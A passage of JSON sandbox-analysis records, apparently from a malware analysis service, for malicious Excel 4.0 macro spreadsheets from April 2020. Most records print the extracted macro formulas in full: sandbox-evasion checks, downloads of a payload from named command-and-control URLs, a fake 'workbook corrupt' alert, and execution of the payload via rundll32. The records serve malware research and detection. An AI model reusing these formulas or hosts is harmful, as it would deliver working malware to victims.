CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"b6gtC94JHv\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e099db5718fd681440d4478aebcf7bf2e71f181ee49f01396ede8a2f13503cc"},"analysis":{"reported":"2020-04-09T16:16:32Z","score":10},"files":[{"filename":"5e099db5718fd681440d4478aebcf7bf2e71f181ee49f01396ede8a2f13503cc","filesize":160768,"md5":"096c3e03e06931dc11b7654eaa38fb2b","sha1":"73c7fa54a964075209c4eaf2908e3c722f82336e","sha256":"5e099db5718fd681440d4478aebcf7bf2e71f181ee49f01396ede8a2f13503cc","sha512":"ace02499e81287dc2857aa22d253c6e821b5288a80959d94ea9b19eb5827c14722ceaf251599485a844d9cdb62319347f7a4d2f88306db08223f95b4d59a597e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e099db5718fd681440d4478aebcf7bf2e71f181ee49f01396ede8a2f13503cc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"o9Mew9Cozt\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e0a5b83966632746359dd383be5869ab069135d3d2abc8aa0871a0b8fde8edb"},"analysis":{"reported":"2020-04-09T16:16:32Z","score":10},"files":[{"filename":"5e0a5b83966632746359dd383be5869ab069135d3d2abc8aa0871a0b8fde8edb","filesize":167936,"md5":"5302b6bcd4b1ef575463711603e4651c","sha1":"d5810784bd3718e71b5e651b8708b60fe42ebb0c","sha256":"5e0a5b83966632746359dd383be5869ab069135d3d2abc8aa0871a0b8fde8edb","sha512":"f555fc5158789dd48bd3a65792c4aca4d22b7636da1ce8e32eff7d263b3ce573a55aed18a5e257d57abe881fd0e8689205e71428feec84f04ffe04807bf53cc5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e0a5b83966632746359dd383be5869ab069135d3d2abc8aa0871a0b8fde8edb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ftzBFEcRCo\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e0e761b946d7efe0ed917a7ba54b2fdc0183a25d0e7b27403a9e5a5aa9a9396"},"analysis":{"reported":"2020-04-09T16:16:32Z","score":10},"files":[{"filename":"5e0e761b946d7efe0ed917a7ba54b2fdc0183a25d0e7b27403a9e5a5aa9a9396","filesize":177152,"md5":"273faa4bb8a333ec5f2a4c7508c2b8d9","sha1":"c3854a1c54b26055580487548f3b95920c418350","sha256":"5e0e761b946d7efe0ed917a7ba54b2fdc0183a25d0e7b27403a9e5a5aa9a9396","sha512":"6cffc8e9984769e283346c55db78a0fdacb8e7bde2d95833c3f4e6ac0a46c8910024bcf97286d21e57ae323c7cd3126e8fc12aecfb16bb3277db7fc040e3c42d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e0e761b946d7efe0ed917a7ba54b2fdc0183a25d0e7b27403a9e5a5aa9a9396.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"X96oyWPhP8\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e2d57675e4bda3e5fa9a669a72e7817b7124e0cff43839cd4067b57ab675388"},"analysis":{"reported":"2020-04-09T16:16:32Z","score":10},"files":[{"filename":"5e2d57675e4bda3e5fa9a669a72e7817b7124e0cff43839cd4067b57ab675388","filesize":206336,"md5":"6c978ac108336d44d530f2d86fefe372","sha1":"6d7a8523e8ce11a0836525acc5125e27d5c9079f","sha256":"5e2d57675e4bda3e5fa9a669a72e7817b7124e0cff43839cd4067b57ab675388","sha512":"c41cc8987cd021e64d72498425ee534db683aa50a2db7301877b6704d54a869a5ce9089f6942676ecaf90225ca29420d671f9b5f682da5719340958fd3551d52","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e2d57675e4bda3e5fa9a669a72e7817b7124e0cff43839cd4067b57ab675388.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LA2aBai2UF\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e2e2bb9fea124d6ee0386910baaf3c7b13404288a746dcba9310e6e67fcf0f1"},"analysis":{"reported":"2020-04-09T16:16:32Z","score":10},"files":[{"filename":"5e2e2bb9fea124d6ee0386910baaf3c7b13404288a746dcba9310e6e67fcf0f1","filesize":185344,"md5":"da4821292c432fe36cab01264084623d","sha1":"0ff2cedd499c38571fd75bea86f77ceadc31bf8a","sha256":"5e2e2bb9fea124d6ee0386910baaf3c7b13404288a746dcba9310e6e67fcf0f1","sha512":"6359ec936f5a3e92954ec98b31d23915120b7d585aa909210c43affb73c7c62e27293450e9fbe723e95cc5f6b05d9452aa7b5641bd0646a3cfc104c3c447a6cf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e2e2bb9fea124d6ee0386910baaf3c7b13404288a746dcba9310e6e67fcf0f1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e31ba584a75bd8f7f3ade8229a87b9ac471231bb500cbb88f4e6a66a28268b7"},"analysis":{"reported":"2020-04-09T16:16:32Z","score":10},"files":[{"filename":"5e31ba584a75bd8f7f3ade8229a87b9ac471231bb500cbb88f4e6a66a28268b7","filesize":168960,"md5":"1c7ddf86f2fe9b1fb26cca53ba5e2c22","sha1":"de1561f1fa1ae8a3479ddf2b3793a14c627b44df","sha256":"5e31ba584a75bd8f7f3ade8229a87b9ac471231bb500cbb88f4e6a66a28268b7","sha512":"aff04ea2c3679b3fa00889b4dc4228296a73a0ac2ec6dadc71c7405ddf3a874541fb973eae3eaaaa6fc3f4aae77e59cf2f39865307397b6f76bf29a9769c7ca4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e31ba584a75bd8f7f3ade8229a87b9ac471231bb500cbb88f4e6a66a28268b7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"01GZYL2N4j\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e381a163ff3fbbaab02f66870aa700861726c1c78a75778aa8abf02d5be0728"},"analysis":{"reported":"2020-04-09T16:16:32Z","score":10},"files":[{"filename":"5e381a163ff3fbbaab02f66870aa700861726c1c78a75778aa8abf02d5be0728","filesize":104448,"md5":"6c87a277948a4e606770d01748aada5d","sha1":"853df7e235de7db30f1182480b0edd54fdd8bf08","sha256":"5e381a163ff3fbbaab02f66870aa700861726c1c78a75778aa8abf02d5be0728","sha512":"7fd0c9a3dfffee63d7ebe352c428620c81223b6d3b1c10cd3e3dccfec0e29ae20fa13a1b842e5dcb48096bcc7fbee0783b70411fd00bb47936a3aa00ad2523a8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e381a163ff3fbbaab02f66870aa700861726c1c78a75778aa8abf02d5be0728.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"imbFeQfpbQ\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e4ada2b825ce22dacd405332a4dc4dab7dbaf9fd01262004af4f0af05a69e6b"},"analysis":{"reported":"2020-04-09T16:16:32Z","score":10},"files":[{"filename":"5e4ada2b825ce22dacd405332a4dc4dab7dbaf9fd01262004af4f0af05a69e6b","filesize":152576,"md5":"a5fe7052e5fdc971986096b2c30bb768","sha1":"222b3eecde3637b4878f53e9438f654c0021f9d4","sha256":"5e4ada2b825ce22dacd405332a4dc4dab7dbaf9fd01262004af4f0af05a69e6b","sha512":"636b3a65a21a749fbaee69405b0c0087d52db2fcc27f5f3f2e901d474fb7d0c129894e44948ebd5e9410e3027eb2c7bf946acff77704eadf384c9d1cf7400620","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e4ada2b825ce22dacd405332a4dc4dab7dbaf9fd01262004af4f0af05a69e6b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SYZXlpZwwr\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e509f28a09186d5403e192df803c71e6df2787824efcc4183daae15d8210f9d"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5e509f28a09186d5403e192df803c71e6df2787824efcc4183daae15d8210f9d","filesize":206336,"md5":"f511da9feb43ea66fec33b94604e774e","sha1":"e8c70dadbdf6cf315837f7026beab63134db02d3","sha256":"5e509f28a09186d5403e192df803c71e6df2787824efcc4183daae15d8210f9d","sha512":"0b1cff6feadc90361f7d15e2f1ac0f7644389b2645028fc5115a948f366fe548a48604076ff326e5ce313ef9a183d5920fbc4eca043f47cffd11b9dc41939529","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e509f28a09186d5403e192df803c71e6df2787824efcc4183daae15d8210f9d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0bCijcccRE\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e50df3f6c55a7e59a013fc3fc8fc5527159f9fc27459bbbe0426d880c54cf8b"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5e50df3f6c55a7e59a013fc3fc8fc5527159f9fc27459bbbe0426d880c54cf8b","filesize":185344,"md5":"1394e41e4d44e4edeef2548d51729807","sha1":"178ceee6b0fe8bce6aed70777e22a6f704128141","sha256":"5e50df3f6c55a7e59a013fc3fc8fc5527159f9fc27459bbbe0426d880c54cf8b","sha512":"d0f93340882e1711b226821a5b846af726c6637b489c62002bb18ee90166600beea1e8b7f8bfac361805083985348a3d2a3e2baf28ce6f76e33f0b35a83b0935","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e50df3f6c55a7e59a013fc3fc8fc5527159f9fc27459bbbe0426d880c54cf8b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e54ea66e00084ee7378c78bc0dd2612b8429028418285146f6d19b41e05766b"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5e54ea66e00084ee7378c78bc0dd2612b8429028418285146f6d19b41e05766b","filesize":167936,"md5":"89cd6cabefb642bb6ac79a651c6bfb23","sha1":"9067cdd02b70a3bda30ee8f2b97302b80d1e3fb3","sha256":"5e54ea66e00084ee7378c78bc0dd2612b8429028418285146f6d19b41e05766b","sha512":"5b5c7562adaa3ba654901e5bab25345e8b6acf9b2d99e0de211bf5efa7e6e715b8d407e6fd3e70fa4e4758830c3cc393f1fd9f9e647e8704488c70443363fe76","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e54ea66e00084ee7378c78bc0dd2612b8429028418285146f6d19b41e05766b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"m17MgkvuHg\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e5614deba19684530b92bc7576c4117f8da8a926ac21c948efdcfb776f1e43d"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5e5614deba19684530b92bc7576c4117f8da8a926ac21c948efdcfb776f1e43d","filesize":152576,"md5":"4130acb85a6e2ad0b2e2a5b7e65b290a","sha1":"f60c7b7f9ee31f8962e3d64e115f3dc2b9b1c5ac","sha256":"5e5614deba19684530b92bc7576c4117f8da8a926ac21c948efdcfb776f1e43d","sha512":"ac2ba3fcf48f08154a4c7471656821664646cbc4ccc59a2aff008085db4d7648465c64ca5e531d012db28c7b978a89b6a2227f3bfca65d116bba7da899e8f4b5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e5614deba19684530b92bc7576c4117f8da8a926ac21c948efdcfb776f1e43d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8LdD7tblkS\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e645ed0f6a0a091a5709999fb5d6e7b229dc474fc9cd2fae7ebca7cf0e80f78"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5e645ed0f6a0a091a5709999fb5d6e7b229dc474fc9cd2fae7ebca7cf0e80f78","filesize":168448,"md5":"f92bb1adc416c2517d1da88e2450ff29","sha1":"1abc503e2f09237951adc39da332d2c9adb99eab","sha256":"5e645ed0f6a0a091a5709999fb5d6e7b229dc474fc9cd2fae7ebca7cf0e80f78","sha512":"d423aa022c1db5a3fbdef7b6c98c0cd1a0f7d40163049eecb3e18c2acc9d904a38fbac6baca056c6dc540f50c1bf918303458f00a55091cd220146a6f6b72704","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e645ed0f6a0a091a5709999fb5d6e7b229dc474fc9cd2fae7ebca7cf0e80f78.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3PWYvCByNl\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e75013b449200b50ba074b903f688ffcc04e596adda558454470b91a3b7542b"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5e75013b449200b50ba074b903f688ffcc04e596adda558454470b91a3b7542b","filesize":145920,"md5":"f13738f2249d73398a3ee31b33e3e2ef","sha1":"c04c546411c9f69c92b6178e96aa598f5a3ef514","sha256":"5e75013b449200b50ba074b903f688ffcc04e596adda558454470b91a3b7542b","sha512":"bcc72e8d575d9ae9c4e31b19976ca95513a450e9b967d24c15c89bcc29edac20192933053eb9ef86848a1bd65b0fa420dc9baec6320f549864898b0fb587a0f1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e75013b449200b50ba074b903f688ffcc04e596adda558454470b91a3b7542b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"MSsBc11VjG\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5e77fcdf9ef388981ef02c40a8bf04c551e85199e619bf01319700448dec3752"},"analysis":{"reported":"2020-04-09T16:16:33Z","score":10},"files":[{"filename":"5e77fcdf9ef388981ef02c40a8bf04c551e85199e619bf01319700448dec3752","filesize":206336,"md5":"6e5e5e7aeea60ae1694c4c26a5dd4690","sha1":"9c486904728562e1c203d3c795a078ab161d1d88","sha256":"5e77fcdf9ef388981ef02c40a8bf04c551e85199e619bf01319700448dec3752","sha512":"26a66779764c28e813d3b0dfacf00e7a65e95e57f954305db00b9bd4dda2264d13c77386a6a0975c0c089c22afd2536874ed27b3cdca27509771a9dcabe7971c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5e77fcdf9ef388981ef02c40a8bf04c551e85199e619bf01319700448dec3752.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 